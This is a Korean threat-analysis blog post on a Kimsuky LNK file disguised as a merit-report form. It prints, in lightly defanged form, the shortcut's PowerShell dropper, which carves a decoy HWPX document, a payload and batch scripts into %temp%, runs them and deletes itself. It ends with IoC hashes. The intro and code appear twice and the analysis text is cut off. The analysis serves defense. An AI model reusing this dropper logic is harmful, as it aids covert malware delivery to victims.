Kimsuky(김수키)에서 만든 공적조서(개인,양식)로 위장한 악성코드
Contents
오늘은 Kimsuky(김수키)에서 만든 공적조서(개인,양식)로 위장한 악성코드인 공적 조서(개인,양식).lnk 에 대해 글을 적어보겠습니다.
일단 해당 악성코드는 lnk 파일 형식으로 돼 있으며 해당 악성코드를 열어 보면 PowerShell 로 동작을 합니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tok(e)ns=*" %a in
('dir C:\Windows\SysW(o)w64\WindowsPowerS(h)ell\v1.0\*rshel(l).exe /s /b /od')
do c(a)ll %a "$dirPath = Get-Locati(o)n; if($dirPath -Match 'Sys(t)em32'
-or $dirPath -Ma(t)ch 'Program Files') {$dirPath = '%temp%'};$exs=@('(.)lnk')
;$lnkP(a)th = Get-ChildItem -Path $di(r)Path -Recurse *.* -(F)ile | where
{$_.exte(n)sion -in $exs} | whe(r)e-object {$_.len(g)th -eq 0x0DD(4)B11F} |
Selec(t)-Object -Ex(p)andProperty FullName ;($)lnkFile=New-(O)bject System.IO
.Fil(e)Stream($lnkPath, [Sy(s)tem.IO.FileMode]::Ope(n), [System.(I)O.FileAccess]
::Read);$lnkFil(e).Seek(0x00(0)0111E, [System.IO(.)SeekOrigin]::Begin);$pdfFile=
Ne(w)-Objec(t) byte[] 0x0000AD(3)6;$lnkFile.Read($pdfFile, 0, 0x0000(A)D36);$pdf
Path = $l(n)kPath.replace('.lnk','(.)hwpx');sc $pdfPath $pdf(F)ile -Encodi(n)g B
yte;& $pdfPath;($)lnkFile.Seek(0x000(0)BE54,[System.IO(.)SeekOrigin]::Begin);$ex
(e)File=New-Object(b)yte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$ex
ePath=$env:temp+'\caption.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek
(0x000E4FE4,[System.IO.SeekOr(i)gin]::Begin);$stringB(y)te = New-Object byte[] 0
x00000636(;)$lnkFile.Read($str(i)ngByte, 0, 0x(0)0000636); $batSt(r)Path = $env:
temp+'\'+'elephant(.)dat';$string = [System(.)Text.Encoding]::UTF8.GetString($st
(r)ingByte);$string | Out-File (-)FilePath $batStrP(a)th -Encoding ascii;$lnkF(i
)le.Seek(0x000E561A,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[]
0x00000147;$lnkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp+'\'+'
shark'(+)'e.b'(+)'a'(+)'t'; Write-Host $ex(e)cutePath; Write-Host $bat(S)trPath;
$bast(S)tring = [System(.)Text.E(n)coding]::UTF8.Ge(t)String($batByte);$bastStri
ng | (O)ut-File -FilePath $exec(u)tePath -Encoding (a)scii; &$executePath; $lnkF
il(e).Close(); remove(-)item -path $lnkPath -force; "&& exit
iconlocation: C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe
}
코드 분석
PowerShell을 악용 하여 파일에서 …
일단 해당 악성코드는 lnk 파일 형식으로 돼 있으며 해당 악성코드를 열어 보면 PowerShell 로 동작을 합니다.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tok(e)ns=*" %a in
('dir C:\Windows\SysW(o)w64\WindowsPowerS(h)ell\v1.0\*rshel(l).exe /s /b /od')
do c(a)ll %a "$dirPath = Get-Locati(o)n; if($dirPath -Match 'Sys(t)em32'
-or $dirPath -Ma(t)ch 'Program Files') {$dirPath = '%temp%'};$exs=@('(.)lnk')
;$lnkP(a)th = Get-ChildItem -Path $di(r)Path -Recurse *.* -(F)ile | where
{$_.exte(n)sion -in $exs} | whe(r)e-object {$_.len(g)th -eq 0x0DD(4)B11F} |
Selec(t)-Object -Ex(p)andProperty FullName ;($)lnkFile=New-(O)bject System.IO
.Fil(e)Stream($lnkPath, [Sy(s)tem.IO.FileMode]::Ope(n), [System.(I)O.FileAccess]
::Read);$lnkFil(e).Seek(0x00(0)0111E, [System.IO(.)SeekOrigin]::Begin);$pdfFile=
Ne(w)-Objec(t) byte[] 0x0000AD(3)6;$lnkFile.Read($pdfFile, 0, 0x0000(A)D36);$pdf
Path = $l(n)kPath.replace('.lnk','(.)hwpx');sc $pdfPath $pdf(F)ile -Encodi(n)g B
yte;& $pdfPath;($)lnkFile.Seek(0x000(0)BE54,[System.IO(.)SeekOrigin]::Begin);$ex
(e)File=New-Object(b)yte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$ex
ePath=$env:temp+'\caption.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek
(0x000E4FE4,[System.IO.SeekOr(i)gin]::Begin);$stringB(y)te = New-Object byte[] 0
x00000636(;)$lnkFile.Read($str(i)ngByte, 0, 0x(0)0000636); $batSt(r)Path = $env:
temp+'\'+'elephant(.)dat';$string = [System(.)Text.Encoding]::UTF8.GetString($st
(r)ingByte);$string | Out-File (-)FilePath $batStrP(a)th -Encoding ascii;$lnkF(i
)le.Seek(0x000E561A,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[]
0x00000147;$lnkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp+'\'+'
shark'(+)'e.b'(+)'a'(+)'t'; Write-Host $ex(e)cutePath; Write-Host $bat(S)trPath;
$bast(S)tring = [System(.)Text.E(n)coding]::UTF8.Ge(t)String($batByte);$bastStri
ng | (O)ut-File -FilePath $exec(u)tePath -Encoding (a)scii; &$executePath; $lnkF
il(e).Close(); remove(-)item -path $lnkPath -force; "&& exit
iconlocation: C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe
}
코드 분석
PowerShell을 악용 하여 파일에서 …
IoC
7df7ad7b88887a06b559cd453e7b65230d0cccff1a403328a521d8753000c6c9
5adfa76b72236bf017f7968fd012e968
5f0d09853fb459500237105201bbf33c09da2126
5adfa76b72236bf017f7968fd012e968
5f0d09853fb459500237105201bbf33c09da2126